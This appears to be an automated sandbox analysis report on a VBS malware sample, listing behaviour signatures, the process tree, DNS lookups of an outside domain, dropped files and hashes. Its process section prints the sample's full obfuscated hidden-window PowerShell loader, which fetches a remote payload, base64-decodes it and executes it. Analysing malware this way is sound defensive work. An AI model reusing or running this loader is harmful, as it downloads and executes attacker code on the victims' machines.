| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4452 wrote to memory of 1468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4452 wrote to memory of 1468 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1468 wrote to memory of 4164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 1468 wrote to memory of 4164 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\033MSOG241591GHD.out.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden "$Vurderingsmndene = 1;Function Corbin($overcools){$Tristimulus=$overcools.Length-$Vurderingsmndene;$Bulgy='Substring';For( $Oliekilde17=4;$Oliekilde17 -lt $Tristimulus;$Oliekilde17+=5){$Selfsustainingly+=$overcools.$Bulgy.Invoke( $Oliekilde17, $Vurderingsmndene);}$Selfsustainingly;}function Digitaliser($Fractioning){ & ($Hverne) ($Fractioning);}$Distributrnet=Corbin 'SnapMUnino ParzForeiD,mblmicrlCha,a,jel/Pese5Nucl. Ri,0M.sa Afri(Bei.W BraiUnprnBjniddykkoPenswOve.sprov AfleNnrvrT ove Hedo1 Tri0 ,rk. Fav0bibl; xtr MantWAulei LocnCrat6Uhol4 Lun;Udgi Chufx Rav6Dirk4M ll;Phyl TulirL,erv,kan:Bar,1Reko2 ,av1Stnk.Radi0Slam)Mutt Pan,GTaoie B.wcC,emkStilo Te./Cinc2Bloo0e gl1Dila0mice0Apri1Gods0Ly,r1Bent IndFI.ogiHensrforbeStavfDideoF.agxdism/ G.y1U.nn2 ill1Bort. amb0Stri ';$Admen=Corbin ' Va UKerasFreseGouvrrasp-Gen.Abootg DeleJulenNurst,upe ';$Beerily=Corbin 'EvighPurstovertI.tepLovb:Mode/Beed/C,ese SteqNobeu fleiUnwhpP.sse KonsEa lgInten katSwit.MusisBreva ,pr.Munkc Ty.oltn mRest/ HypBUn rrN taa,ustnSalgdSo.sbposto HlsmGen,bB gieNe fsR gi.,isahpreahFunnk cym ';$Graduerende156=Corbin 'Pseu> Ava ';$Hverne=Corbin 'Sh.cimisseTensx hjt ';$Retrospektions='Gslings';$Adverbialize = Corbin 'BuseeresocselvhWardoOkku Fi,a%Org aBargpT.bup Deldops.a,nmat FinaPrek% Sl.\MiniS Ta t,roniSerolFoollDetaestrblBog.eStrig bi,sPost.Skriu,nkyl D,bvBeta Orga&Ndpl&Gips blinehilbcCe,lh AfsoFrav unretHod ';Digitaliser (Corbin 'D,ge$Melog ortl DanoKon,bL.mbapolil Com: ScaTNitraHul nJ.rddMy.mrDo no GendSacrsInefbWid.e Remtdicon .xidOscierenolDirlsUsp.eSubirE.ols Sma=Emb.(R.vfchypem Aktdfl.e Mell/FipscUnfo sids$ ,ogAAfsndJutlv,esmeTotarKancbIngei.reaa Cy l.aryiSlatz Musebr.s)Coun ');Digitaliser (Corbin 'Brkj$OutrgNe rlHoveoPetrbFosfaSpillCont: DysP H.piSkiln UdrlPaapiDrejgSha,=Dent$Sim.BBouneClioeArnor AnhiMicrlCereyUd.v.H rns,ydrpSelvlBrndisvi.tRese(Lini$Nav GCathrUnimaCaped.tilu .eteFluerSalae .ycnTer,dWiree Fre1Came5 ,ke6Buc.)Matt ');$Beerily=$Pinlig[0];$ustadighedens= (Corbin 'Fash$ MacgGrnslF.kuo Monb ShiaAridlHalf: HilG aute aannMarmn lvee C.nm,avotSk.lrCrepkPr,skWhale KitnF emdJin eUsynsReno= UncN.alae Spewfi.i-DiswOBearbPimpjTaktesplacB votS,ov CandSF gsyPlejs,ilotSvabeSaddm Ton.TornN DameServt H.p. UncWsu,ae Renb olyCOdonlaveriHaireUninn,lomt');$ustadighedens+=$Tandrodsbetndelsers[1];Digitaliser ($ustadighedens);Digitaliser (Corbin 'Isoc$ P aGMaileJerrnHeren egaePuz.mOrtot Knor.uickmystk AlvePol n St dLgehe,abrsPell.Se tHPorgeBrnda anddForee Bder Un.sLap.[He.a$waffA,ysndCacom Pa.e GlonRo o] B,y= Tyd$S,arD,orsih tpsKa.atD,parOm.oi Semb Opsucocrt Untr refnGalee HootVind ');$Tyndvgget=Corbin 'gavs$VectG Sp,e BrsnTrusnLazyedesimStyntU,plr Hagkforck,bseeRe,unHousdAn.ie OnosKo g.IncoDt beoGlauwSukkn fo l KiwotoxiaFiffdTropFComtiHypelB.sie Cla(xe.o$ NriBUne,eSupeeHelbrCisaiHemolAneuy A g,Rhac$Trang repr ForaR innGudeuOverlDrifaTranttechiK.sto Co,nSekseAen.rHystnXra eUnde) non ';$granulationerne=$Tandrodsbetndelsers[0];Digitaliser (Corbin 'skit$kologGldelUndeoEgesbMot.aVestlSemi: MinERes qLoftu begiPrajvSa.moGs.ec livaGrettMa.iiI.puoRac,nrimm=Filt(o.erT,pheeSplksf tit Exc- SupPR oxaStimt,ocohse.i Syvt$in egHolir HolaLyr ndk,iu BedludskaUlpftDeeriArthoI,gan PhyeRe,rr GranPh.teGree)Prep ');while (!$Equivocation) {Digitaliser (Corbin 'Drud$ .ycgAkuplFlago SpobkrlhaReprl Non: P oRFrytaSwahnBumbssp.neSqualMisllRene=Hil,$ ChotS ggr oru,ynseSten ') ;Digitaliser $Tyndvgget;Digitaliser (Corbin ' MotSSynctDrila,enirIndstue f-Nec.S,jrglBuc e,uhae IndpNonm takk4St.r ');Digitaliser (Corbin ' Pa,$Unpag Opsl Si.oTagrbNotaa SemlAmer:VrdiERektqAnt,u.eetiNedsvVandoModec ElvaV,rbtPotoiLit.oFacan,erb=Lydl( FilT Ty,eEntasBri,tmon -IdeaPImpaaDelptUni.hType Bre$ BelgGladrVol,aTokrnKappuForblFontaExpitC,aniVa,ioAnalnPrineMadrrTentnCataeHurl)Haye ') ;Digitaliser (Corbin ' ko,$ToetgSkovlBekro BrnbcaptaNol l Pro: GosG Af.aEle,rrin,dnazeb.issrUdl a ,rdcstereUndl= Mem$ rang GynlSneroUnreb BegaLaudlSnek: StiS.urraOprymForhm.efaeUtron issbVampy orgFuntgLucieToaddSh,ien dp+Redn+Clas%Para$bortP E siAumanPhosl PhoiEx eg.yns.Justc PhooSilhu O,knUd.itCrom ') ;$Beerily=$Pinlig[$Gardbrace];}$Guiding=313361;$Hygsom=28928;Digitaliser (Corbin ' nt$Pharg Wrol ViloAfpubObjeaSoftlRost:BeleLBurdaH.venadvod NyhbOp arRke,uSubsgSy,osM tea Nerr QuiePishaPerdlRec eMisar MatsKr.e R st= Sch AutoGM.lte Agit Tig-B,neCHjemo modnK.autFarleSpiknUnbitProd No m$ iorg AfprScypaLingnAcinu LamlSlanaSalmtInoxiO eroaandnRv reSvirrDes n MbleFree ');Digitaliser (Corbin 'Ven,$ AdmgParalImpao Bryb chra,ffil Mil:DiabrMathe G udSprosTyndtBlocaBarmrConct Br,sQuad Filc= Poo udb[SjufSSubayPenssWarlt .nreVannmHybr.,yksCR,seoAfhnnHelivChuceNoncrI,dmt hje]Rese:Impa:Aft FKal,rY,kao .etm Sp.BAnywa.ults.pile Azt6Copp4Pre SQuittR.mmrpedoiCamonEurygMira(Unde$cataL Ni aA,dinHaardProgbCozyr,urtuOua gvangs B ga torrGia,eD,skaPseuludbue,igmr PhasStat)Kals ');Digitaliser (Corbin 'ti.o$BjrngRel l C uoTilsbKanaa.alelSola:RevaDPyraeSharp R,ae Soondibbd Proa ypon .vrtAbdisSkat Til=T.ve Subt[ImmoSFlomyMi isCyphtHesteDatemHyld. DisT UrieY.guxLap,tFals. BukERevonUti.cUdsmoTrandBnk i AftnOmdegPe t]Yder: Hur:GrunA TekSMob.CGolfIun.eILini.FngsG.lute hentS,seSSkogtSjlerGonoi Nonn Sadgg.yc( mes$ PaarOldbeCorodIsotsJon.tB,ndaLigerCompt HarsVild)Abil ');Digitaliser (Corbin 'Udfa$ lgg.nwolSnekoAngobDeseaFiskl Tot: VowAEntogPromgMo.iePeddlSe,ia Indt ,nuiHor.o s.bnWo,d= Aqu$ R cDZongeDeclpBataeContnZonodAbsia.eginDolltTriqsSkam.AoifsWithuHe.abparos mpot,olkrApotisparnRygtga.an( U,t$HjemG uttuD,foiPrimdBlokiSu.gn s.lgCiv.,Sk.v$ SkrH UdsyDi ggShelsToo oBourm Nep)Vrne ');Digitaliser $Aggelation;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stillelegs.ulv && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| NL | 52.111.243.29:443 | tcp | |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
| US | 8.8.8.8:53 | equipesgnt.sa.com | udp |
Files
memory/1468-0-0x00007FFE7DD73000-0x00007FFE7DD75000-memory.dmp
memory/1468-1-0x000001E474540000-0x000001E474562000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3qexmpg.1qj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1468-11-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp
memory/1468-12-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp
memory/1468-13-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp
memory/1468-14-0x00007FFE7DD73000-0x00007FFE7DD75000-memory.dmp
memory/1468-15-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp
memory/1468-16-0x00007FFE7DD70000-0x00007FFE7E831000-memory.dmp